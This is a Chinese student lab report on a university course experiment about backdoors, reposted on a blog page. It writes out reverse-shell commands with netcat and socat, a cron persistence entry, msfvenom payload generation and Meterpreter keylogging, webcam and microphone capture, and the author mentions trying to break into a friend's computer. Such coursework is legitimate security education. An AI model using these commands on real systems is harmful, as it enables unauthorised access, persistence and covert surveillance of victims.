2018-2019-2 20165204《网络对抗技术》 Exp2 后门原理与实践

最新推荐文章于 2024-04-14 20:55:02 发布
最新推荐文章于 2024-04-14 20:55:02 发布
阅读量102 收藏
点赞数
文章标签: shell 操作系统 运维
原文链接:http://www.cnblogs.com/jph596299009/p/10585678.html
版权

2018-2019-2 网络对抗技术 20165204 Exp2 后门原理与实践

一、实验内容

1.准备阶段

  • kali虚拟机,win10本机(我黑我自己)
  • 关闭防火墙
  • 两机ping通。其中win10主机IP为10.1.1.138,kali虚拟机IP为192.168.255.131。
    1296584-20190323211208554-695693456.png

2. 使用netcat获取主机操作Shell,cron启动

首先我们先通过反弹端口在win10端获得kali的权限。
在win10中ncat文件夹内(内含ncat.exe)输入ncat.exe -l -p 5204,开启对端口5204的监听。
因为Kali中自带ncat,故直接输入nc 10.1.1.138 5204 -e /bin/sh,即可在win10端获得Linux系统的权限。
1296584-20190323211238759-1958390234.png
反之亦然可以成功。
1296584-20190323211243403-364715557.png

cron启动。通过Linux中的cron自动定时启动后门程序,就可以让受害人在不知情的情况下悄悄地连接攻击机,而不是拿刀架在对方脖子上让他输入刚才那段指令。

  • 使用 crontab -e指令去增加一条定时任务。
  • 选择第三项,使用vim编辑更改cron。

  • 在最后一行添加11 * * * * /bin/netcat 10.1.1.138 5204 -e /bin/sh。具体格式其实最后一行有相应介绍,对应的m、h、对应的就是分钟、小时等时间参数。
    1296584-20190323211316818-1316054651.png

  • 使用crontab -l可查看cron状态。
    1296584-20190323211324548-1545512695.png

  • 时间到了19:11分,自动启动cron中的指令,win端获得权限。
    1296584-20190323211331688-1179225971.png

3.使用socat获取主机操作Shell。 任务计划启动

本步骤中win10成为了被害者。在此电脑右键->管理->任务计划程序->创建任务->触发器新建任务并设置触发器为工作站锁定时
1296584-20190323211352244-1482901232.png

再在操作选项卡中,设置启动程序。选择路径为scot.exe的路径,参数中加上tcp-listen:5204 exec:cmd.exe,pty,stderr
1296584-20190323211438029-2071853409.png

接下来,在任务计划程序库中找到20165204这个任务,右击运行。弹出来一个

1 [main] socat 6156 find_fast_cwd: WARNING: Couldn't compute FAST_CWD pointer. Please report this problem to
the public mailing list cygwin@cygwin.com
1296584-20190323211428873-1863511901.png

心头一惊。却发现再在kali中输入socat - tcp:10.1.1.138:5204仍然成功获得了win10的shell权限。至此,黑入成功。可能因为使用的是win10主机做的实验,故有所不同。
1296584-20190323211447028-447376853.png

4.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

首先使用指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.138 LPORT=5204 -f exe > 20165204.exe生成后门文件。
1296584-20190323211510709-1265035718.png

此处需注意LHOST为本机(kali)的IP地址。

在win10命令行输入ncat -l 5204> 20165204bd.exe,开启监听准备接收后门程序相关数据并写入20165204.exe中。

在kali中输入nc -nv 10.1.1.138 5204 < 20165204.exe将数据传送过去。可见已生成20165204bd.ex程序。
1296584-20190323211531499-1869266064.png
在kali中使用msfconsole,依次输入以下指令。
1296584-20190323211620909-248231381.png

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.255.131
set LPORT 5204
show options
exploit

成功!
1296584-20190323211632888-962577253.png

5.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

好了,现在可以在别人的电脑里为所欲为了。
(玩的非常开心)
screenshot可以进行屏幕截图。
1296584-20190323211800039-380353586.jpg

record_mic可进行录音。
1296584-20190323211942367-77374708.png

webcam_snap可对摄像头进行拍照。
1296584-20190323211815938-843182203.jpg

webcam_stream甚至可以录像。直接沦为网络直播..
1296584-20190323211821588-781658952.png

keyscan_start开始进行击键记录。
keyscan_dump读取击键记录。
1296584-20190323211845053-2062143920.png

显然读取到了我输入无敌秘籍“whosyourdaddy”,太可怕了。

二、基础问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

下载的东西应用程序中捆绑啊,或者那些不开显示拓展名的小白以为哪个.exe是什么别的东西打开。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win中可将应用程序加入win.ini(用户窗口环境的概貌) system.ini(windows初始配置信息) winstart.bat(安装程序后自动启动) wininit.ini(安装程序后删除工作)
这些文件中,这是信息安全概论课程上提到过的。

linux中不太清楚,目前已知的只有cron定时启动方式。

(3)Meterpreter有哪些给你映像深刻的功能?

最可怕的应该是击键记录和摄像头录像了吧。感觉自己暴露无遗。

(4)如何发现自己有系统有没有被安装后门?

我在使用的时候的一直开着360的监控球,时时观察自己的流量情况和内存使用情况,如果有异常的话就算进程不能及时发现,但是外部想要获取本机的相关信息肯定要走网络的,所以还是相对安全。

三、实验总结与体会

本次实验极大地引起了我的兴趣,实验成功后,我还兴奋地尝试想要黑入我的朋友的电脑,但是在ping通第一步就失败了,我也不知道怎么回事(大雾)。虽然限制很多,自己黑自己,但是一旦成功,就真的可以为所欲为了。想起来看过的某一部关于暗网的电影,反派只通过虚拟世界的操作就将一群人的命运玩弄于鼓掌之中,真的是细思极恐。

本次实验中受到神秘力量的庇佑,一路上都没有出现什么大问题,希望以后一直如此。

转载于:https://www.cnblogs.com/jph596299009/p/10585678.html

weixin_30908941
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic CVE-2018-2628--exp
01-20
weblogic CVE-2018-2628--exp
cygwin在Windows8.1中设置ssh的问题解决
weixin_30252155的博客
10-21 67
为了在Windows 8.1上直接使用Linux环境和hadoop开发,装了cygwin,同时设置ssh无密码登录。 但正常ssh-keygen后复制到authorised_keys后登录出现提示: Permissions 0660 for '/home/***/.ssh/id_rsa' are too open. It is required that your private key...
2018-2019-2 20165114《网络对抗技术Exp2 后门原理实践
weixin_30493321的博客
03-21 114
目录 一、实验准备 二、实验内容 三、基础问题回答 四、实验过程及步骤 五、实验总结与体会 六、实验中遇到的问题与错误。 一、实验准备 1、后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 一个相对狭义一点的后门的概念: 特指潜伏于操作系统中专门做...
2018-2019~3 20165107 《网络对抗技术Exp2 后门原理实践
weixin_30822451的博客
03-23 102
20165107 《网络对抗技术Exp2 后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机...
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践
diaominduo4849的博客
03-24 109
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机...
MSP-EXP430G2.rar
03-08
MSP430G2553 LaunchPad (MSP-EXP430G2)开发版官方资料全集,包括原理图和相关示例代码
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
K8_Struts2_EXP S2-045 20170310.rar
03-31
Struct 2 S2-045/046 漏洞检测工具,可以有效检测我们服务是不是存在该漏洞,从而有效的解决漏洞,工具为exe的可执行文件,杀毒软件会自动禁用,只要手动恢复就可以用了。
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
The missing semester
weixin_73074012的博客
04-11 838
MIT 的 Missing Semester学习中常用的内容整理
shell中如何将小写字母转换为大写?
最新发布
码不停歇的博客
04-14 82
Shell脚本中,将小写字母转换为大写字母可以通过tr命令或awk命令来实现。
Shell学堂】数学运算相关脚本
翡翠泪滴的博客
04-09 206
【代码】【Shell学堂】数学运算相关脚本。
[网鼎杯 2020 玄武组]SSRFMe
2202_75361164的博客
04-09 574
## 主从复制 [[redis-主从复制]] ### 原理 - 字面意思,redis为了数据更改方便,有这一模式,主机的内容更改会导致从机的内容跟着更改。 - 这时我们将自己的服务主机设置为主机,目标的设置为从机,则从机会有主机的执行脚本,从而rce - 详细的参考博客
Shell脚本学习(一):Shell入门与Shell变量
qq_53324833的博客
04-12 826
对于入门,我们需要知道几个概念:1、Shell是什么2、Shell脚本是什么3、为什么要学习Shell脚本,即Shell脚本程序的作用4、Linux系统默认的Shell解析器先来看一个问题:Linux系统是如何操作计算机硬件的?如CPU、内存、磁盘和显示器等?答案:是通过使用Linux的内核来进行计算机硬件的操作的。那么要如何才能使用Linux的内核呢?当然就是通过编写Shell命令来调用Linux内核去执行对计算机硬件操作的啦。
window2012等显示桌面上面的【我的电脑】图标
chengg0769 平淡无奇见真知
04-14 126
服务器版本,登录进去,就留个垃圾桶在桌面上,一点也没有用处。如何显示经典的“我的电脑”呢。网络介绍了几种方法都木用。这种还点用:win图标点右键》运行:rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0如上这个方法很拽。因为英文不好都不会输入这些文件名,甚至都不知道他们是干嘛的。注意到这个窗口的标题没?---桌面图标设置。就表明这是系统的一个小功能。我们使出绝世武功。运用搜索大法。 我们搜索:桌面图标,匹配到这里:红色箭头位置进入第一个图片所示的界面。ms
HamonyOS —— HDC 指令
XuZhenhao
04-11 200
hdc install -r 【hap路径】持续待更新......
Shell】循环语句基础
翡翠泪滴的博客
04-09 485
循环在编程中通常指循环结构。循环结构是编程中的一种控制结构,它允许代码在满足特定条件时重复执行一段特定的指令集合,这部分重复执行的代码被称为循环体。初始化:设置循环开始前的初始条件,例如设置计数器变量的起始值。循环条件:一个布尔表达式,用于判断是否继续执行循环体。只要该条件为真,循环体就会一直执行。循环体:包含需要重复执行的代码块。迭代:在循环体的每次执行后更新循环条件,通常是改变计数器变量的值。终止条件:当循环条件不再满足时,循环结束,程序继续执行循环结构之后的代码。
linux脚本
gao_tianLiang的博客
04-12 116
出现这样的错误,是因为Shell脚本在Windows系统编写时,每行结尾是\r\n,而在Linux系统中行每行结尾是\n,所以在Linux系统中运行脚本时,会认为\r是一个字符,导致运行错误。解决方法:去除Shell脚本的\r字符。
MSP-EXP430G2电机驱动
07-28
MSP-EXP430G2是德州仪器提供的开发工具,也称为LaunchPad,用于学习和实践如何使用其微控制器。在本篇文章中,我们介绍了如何将伺服电机与MSP430G2 LaunchPad开发板进行连接。伺服电机是一种包含了直流电机、位置控制系统和转动机构的电机。在我们的文章中,我们使用的是SG90伺服电机,它是一款180度伺服器,可以将轴从0-180度定位。因此,您可以使用MSP-EXP430G2开发板来驱动伺服电机并控制其位置。\[1\]\[3\] #### 引用[.reference_title] - *1* *3* [使用MSP430G2 LaunchPad开发板驱动伺服电机的方法](https://blog.csdn.net/woshi_ziyu/article/details/81206876)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [使用MSP430G2 LaunchPad开发板连接步进电机的方法](https://blog.csdn.net/woshi_ziyu/article/details/81325750)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值